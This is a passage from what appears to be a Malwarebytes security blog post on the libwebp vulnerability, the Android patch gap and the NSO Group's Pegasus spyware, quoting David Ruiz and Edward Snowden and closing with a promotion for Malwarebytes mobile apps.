And although Google and Apple have issued updates to patch this vulnerability, libwebp is used in many other applications. And it may take a while before the Android update trickles down to every make and model. Regular readers may know that when there is an update for the Android operating system—software that sits at the core of about 70% of all mobile devices—it can take a very long time to reach end users due to a patch gap. This is because many mobile phone vendors sell their devices with their own tweaked versions of Android and the patches need to be tested before they can be rolled out on those versions.

The NSO group that markets the Pegasus spyware have shown they are interested in acquiring such exploits. As we wrote years ago, the Pegasus spyware has been around for years and we should not ignore its existence.

Our own David Ruiz wrote:

> “Pegasus is reportedly instrumental to several governments’ oppressive surveillance campaigns against their own citizens and residents, and, while NSO Group has repeatedly denied allegations that it complicitly sells Pegasus to human right abusers, it is difficult to reconcile exactly how the zero-click spyware program—which non-consensually and invisibly steals emails, text messages, photos, videos, locations, passwords, and social media activity—is at the same time a tool that can, in its very use, respect the rights of those around the world to speak freely, associate safely, and live privately.”

Pegasus is not new. The company behind it launched in 2010, and it reportedly gained its first overseas customer just one year later. For years, Citizen Lab has been tracking the spread of Pegasus, searching for government clients and tracking down mobile devices that were hacked by the spyware. Back in 2016, the group’s investigations helped spur MacOS updates to fix severe vulnerabilities that could have been exploited by Pegasus. In 2018, Citizen Lab also identified 45 countries that were potentially relying on Pegasus to conduct surveillance.

After learning about the findings from The Pegasus Project, former NSA defense contractor and surveillance whistleblower Edward Snowden warned that spyware is not a small problem. It is, he said, everywhere.

> “When I look at this, what the Pegasus Project has revealed is a sector where the only product are infection vectors, right? They don’t—they’re not security products. They’re not providing any kind of protection, any kind of prophylactic.”

Snowden said.

> “They don’t make vaccines. The only thing they sell is the virus.”

**We don’t just report on Android and iOS security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your Android devices by downloading Malwarebytes for Android today. And keep threats off your iOS devices by downloading Malwarebytes for iOS today.

Tag

#apple